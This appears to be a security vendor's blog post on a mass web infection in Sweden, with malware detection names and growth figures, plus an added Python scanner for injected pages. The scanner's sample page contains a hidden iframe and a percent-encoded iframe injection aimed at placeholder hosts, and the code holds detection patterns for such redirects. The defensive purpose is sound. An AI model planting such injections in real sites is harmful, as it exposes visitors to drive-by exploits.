Web-based threats such as malicious links on social media, infected websites and malicious ads are terms we read about quite often. We security experts have for quite some time tried to emphasize the importance of protecting both your website and your computer from being infected, since these malicious websites often exploit client-side vulnerabilities. These vulnerabilities have been one of the major attack vectors for malware writers in recent years, but are they still a problem?
We are constantly seeing new software vulnerabilities, and the bad guys are very quick to develop exploits, which are then hosted in their exploit kits. The vulnerabilities themselves are not dangerous unless the attacker is able to exploit them on the victim’s computer. The attackers have therefore developed ways to get victims to visit a website, for example, which then triggers the exploit. Some common ways are social engineering, or infecting a legitimate website with redirection code that points to the exploit kit.
Last month almost all major vendors released critical security updates for their software, including Adobe, Oracle, Apple, Microsoft and Mozilla. I then started to research the current threat landscape, focusing on Sweden since I am the security researcher for the Nordic region, and after just a few minutes I saw that both Swedish websites and Swedish users were under attack.
In September we saw a 3700% increase in JavaScript-based redirection scripts, specifically Trojan.JS.Redirector.ro. This malicious redirector went from 908th place to 15th place in the list of the most detected malware in Sweden in one month. This code only redirects users to another URL, and I found it strange that we did not see a corresponding increase in detected malware in September.
What we are experiencing in Sweden now is a large mass infection. In October I saw a lot of PDF vulnerabilities being exploited. For example, Exploit.JS.Pdfka.evi increased by over 500% and Exploit.JS.Pdfka.ext by 188%. I also saw a big increase in iframe clickers, including an increase of over 300% for Trojan-Clicker.HTML.Iframe.kr. All of this was a pretty good indication that something was going on in Sweden, but I still felt that I was missing something. When I looked deeper I also started to see that new variants of exploits were being detected. In October alone we have identified over seven new exploit variants attacking Swedish users. It’s also interesting that Java exploits are seen far more often than PDF exploits. The new exploits are:
- Exploit.Java.CVE-2010-0840.dj
- Exploit.JS.Pdfka.ezg
- Exploit.Java.CVE-2010-0840.dc
- Exploit.Java.CVE-2010-0840.do
- Exploit.Java-CVE-2010-0840.df
- Exploit.Java-CVE-2010-0840.dn
- Exploit.Java-CVE-2010-0840.dd
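The injected redirection code described above (hidden iframes and obfuscated JavaScript that sends the visitor on to an exploit kit) is something a site owner can scan their own pages for. The following Python scanner is an added example, not code from the original post or from any Kaspersky product; the HTML sample, the example.invalid hostnames and the detection heuristics are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote
# Heuristics for the two injection styles the post describes: hidden <iframe> elements
# ("iframe clickers") and JavaScript that redirects or writes a frame, often percent-encoded.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
UNESCAPE_ARG = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)
REDIRECT_OR_FRAME = re.compile(r"(?:window|document)\.location|location\.(?:href|replace)|<iframe", re.I)

def classify_script(js):
    """Label one inline script body, or return None if it looks benign."""
    if REDIRECT_OR_FRAME.search(js):
        return "js-redirect"
    # Decode unescape('%..') literals and look again; the frame is often hidden there.
    decoded = " ".join(unquote(m) for m in UNESCAPE_ARG.findall(js))
    return "obfuscated-js-redirect" if REDIRECT_OR_FRAME.search(decoded) else None

class InjectionScanner(HTMLParser):
    """Collects (label, detail) findings for hidden iframes and suspicious scripts."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            # 0x0 / 1x1 frames and CSS-hidden frames are invisible to the visitor
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style") or ""):
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        label = classify_script(data) if self._in_script else None
        if label:
            self.findings.append((label, data.strip()[:60]))

def scan_html(html):
    """Scan one HTML document and return its list of (label, detail) findings."""
    parser = InjectionScanner()
    parser.feed(html)
    return parser.findings

# Constructed sample page: a normal banner frame plus two injected blocks.
SAMPLE = """<html><body><h1>Welcome</h1>
<iframe src="http://example.invalid/banner" width="300" height="250"></iframe>
<iframe src="http://example.invalid/kit" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fkit2%22%3E%3C%2Fiframe%3E'));</script>
</body></html>"""
```

Running `scan_html(SAMPLE)` reports the 1x1 hidden frame and the percent-encoded `document.write` block while leaving the visible banner frame alone; the heuristics are a starting point for your own site checks, not a substitute for an up-to-date scanner.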
All in all, it seems clear that we’re seeing a major attack going on in Sweden at the moment. Of course, we’ll keep you informed of new developments. I would also like everyone to make sure that you don’t just rely on Windows Update for security updates, but that you also update third-party applications such as Adobe products, Java and other client software.
UPDATE: It seems that the mass infection I wrote about was the “aftershock” of the major mass infection of ASP.NET sites we wrote about some time ago. Read the full article about that infection here.
When analyzing the statistics we are still seeing an increase in Java exploits, and we are trying to determine whether there is a connection to the old infection or whether we are seeing something new.
Sweden is under attack – mass infection and new exploits!